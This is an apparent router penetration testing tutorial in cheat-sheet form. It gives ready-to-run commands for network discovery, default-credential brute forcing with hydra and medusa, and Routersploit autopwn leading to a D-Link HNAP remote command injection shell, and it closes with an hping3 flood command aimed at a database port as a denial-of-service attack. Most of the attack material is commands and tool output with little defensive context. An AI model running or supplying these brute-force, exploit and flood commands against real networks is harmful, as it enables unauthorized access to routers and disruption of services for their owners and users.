G2$2

1. Router Penetration Testing
2. ===========================
3.  
4. Router is the central connecting device, which provides the connectivity to all the end devices and nodes along with the network components of a particular network. Router Pentesting is a process in which a network auditor has seen cross check all the possible information gathering as well as exploitation methods as per the router. The goal of router pentesting is to know scope of network by identifying the total number of access points, MAC address of each router, model number of router, company name of router, firmware version.
5.  
6. There are two types of attacking procedures for that :
7.  
8. Active Router Attack : In this attack we try to attack directly on the Router’s IP which is 192.168.0.1 or 192.168.1.1 mostly and try to halt the services in the network and getting the juicy data out of the Router.
9. Eg. Credentials Brute force attack, Wifi Jammer etc. on Public Networks
10.  
11.  
12. Passive Router Attack: In this attack we do not engage the router in the process moreover we play with the broadcasted packets data generated by the router. The attack doesn’t goes directly to the Router but the attacker can use the data which is being originated from the or through the router and moving on.
13. Eg. Sniffing and Monitoring the WIFI Traffic, doing MITM and other things.
14.  
15. Attack Vectors
16. Information Gathering of the Router :
17. When connected to the network :
18. Terminal : route -n
19. Terminal : netdiscover -r 192.168.0.1/24
20. (This can be used for getting the MAC address of the router)
21. When we got the MAC address : https://www.macvendorlookup.com/ can be used for getting the Vendor Name.
22.  
23. How to find out more about Router Vendor : (When the MAC Address is spoofed)
24.  
25. Airmon-ng start wlan0
26. Airodump-ng -M --bssid -c wlan0mon. (Big Window)
27.  
28. -----------------------------------------------------------------
29.  
30.  
31. http://192-168-1-1ip.mobi/default-router-passwords-list/
32. http://www.routerpasswords.com/
33. https://www.bestvpn.com/default-router-login-details/
34.  
35.  
36. Brute Forcing on Default Credentials :
37. Default credentials are those which are not changed after the purchase of the Router itself, these are the Router Login page Credentials.
38. Mostly the Username goes with Admin only.
39.  
40. For Brute Forcing we are gonna using some advanced brute force tools which are pre-installed in Kali Linux.
41. Tools : Hydra, Medusa, Xhydra, Burpsuite
42.  
43. Attacking Methods:
44.  
45. Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
46.  
47. Here, -l : username, -P : Passwords, where we put a dictionary of credentials, Rockyou.txt , http-get / http-post : Way of transmission of data , 192.168.0.1 : Default Router's IP Address.
48.  
49. Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
50.  
51. Here, -h : Target IP Address , -u : Username , -P : Password, here we can embed Dictionary if credentials, -M : Method of transmission
52.  
53.  
54. Routersploit Framework (RSF)
55. ========================
56. It is a tool written in python used for automating the process of router exploitation. This is not pre-installed in Kali Linux, so we have to get it from external sources.
57.  
58. Downloading Steps :
59. Installation on Kali Linux :
60. apt-get install python3-pip
61. git clone https://www.github.com/threat9/routersploit
62. cd routersploit
63. python3 -m pip install -r requirements.txt
64. python3 rsf.py
65.  
66. Running Steps :
67.  
68. When the Routersploit Framework is on,
69. rsf > help (For help Menu)
70. Global commands:
71. help - Print this help menu
72. use <module> - Select a module for usage
73. exec <shell command> <args> - Execute a command in a shell
74. search <search term> - Search for appropriate module
75. exit - Exit RouterSploit
76. rsf > use scanners/ (Using Scanners : Will show the list of every scanner)
77. scanners/2wire_scan
78. scanners/billion_scan
79. scanners/huawei_scan
80. scanners/netcore_scan
81. scanners/tplink_scan
82. scanners/3com_scan
83. scanners/cameras_scan
84. scanners/ipfire_scan
85. scanners/netgear_scan
86. scanners/ubiquiti_scan
87. scanners/asmax_scan
88. scanners/cisco_scan
89. scanners/juniper_scan
90. scanners/netsys_scan
91. scanners/zte_scan
92. scanners/asus_scan
93. scanners/comtrend_scan
94. scanners/linksys_scan
95. scanners/routers_scan
96. scanners/zyxel_scan
97. scanners/autopwn
98. scanners/dlink_scan
99. scanners/misc_scan
100. scanners/shuttle_scan
101. scanners/belkin_scan
102. scanners/fortinet_scan
103. scanners/movistar_scan
104. scanners/technicolor_scan
105. scanners/bhu_scan
106. scanners/grandstream_scan
107. scanners/multi_scan
108. scanners/thomson_scan
109. rsf > use scanners/autopwn (using autoseatch)
110. rsf (AutoPwn) > show options
111.  
112. Target options:
113.  
114. Name Current settings Description
115. ---- ---------------- -----------
116. target Target IP address e.g. 192.168.1.1
117. port 80 Target port
118.  
119.  
120. Module options:
121.  
122. Name Current settings Description
123. ---- ---------------- -----------
124. threads 8 Number of threads
125.  
126.  
127. rsf (AutoPwn) >
128.  
129. rsf (AutoPwn) > set target 192.168.0.1
130. [+] {'target': '192.168.0.1'}
131. rsf (AutoPwn) > show options
132.  
133. Target options:
134.  
135. Name Current settings Description
136. ---- ---------------- -----------
137. target 192.168.0.1 Target IP address e.g. 192.168.1.1
138. port 80 Target port
139.  
140.  
141. Module options:
142.  
143. Name Current settings Description
144. ---- ---------------- -----------
145. threads 8 Number of threads
146.  
147.  
148. rsf (AutoPwn) >
149.  
150.  
151. [*] Could not verify exploitability:
152. - exploits/routers/dlink/dsl_2740r_dns_change
153. - exploits/routers/dlink/dir_815_850l_rce
154. - exploits/routers/dlink/dsl_2640b_dns_change
155. - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
156. - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
157. - exploits/routers/shuttle/915wm_dns_change
158. - exploits/routers/billion/5200w_rce
159. - exploits/routers/cisco/catalyst_2960_rocem
160. - exploits/routers/cisco/secure_acs_bypass
161.  
162. [+] Device is vulnerable:
163. - exploits/routers/dlink/multi_hnap_rce
164.  
165. rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
166. rsf (D-Link Multi HNAP RCE) > show options
167.  
168. Target options:
169.  
170. Name Current settings Description
171. ---- ---------------- -----------
172. target Target address e.g. http://192.168.1.1
173. port 80 Target Port
174.  
175.  
176. rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
177. [+] {'target': '192.168.0.1'}
178. rsf (D-Link Multi HNAP RCE) > show options
179.  
180. Target options:
181.  
182. Name Current settings Description
183. ---- ---------------- -----------
184. target http://192.168.0.1 Target address e.g. http://192.168.1.1
185. port 80 Target Port
186.  
187.  
188. rsf (D-Link Multi HNAP RCE) >
189. rsf (D-Link Multi HNAP RCE) > run
190. [*] Running module...
191. [*] Target might be vulnerable - it is hard to verify
192. [*] Invoking command loop...
193. [*] It is blind command injection, response is not available
194.  
195. [+] Welcome to cmd. Commands are sent to the target via the execute method.
196. [*] Depending on the vulnerability, command's results might not be available.
197. [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
198.  
199. -----------------------------------------------------------------
200.  
201.  
202. DDOS
203.  
204. hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306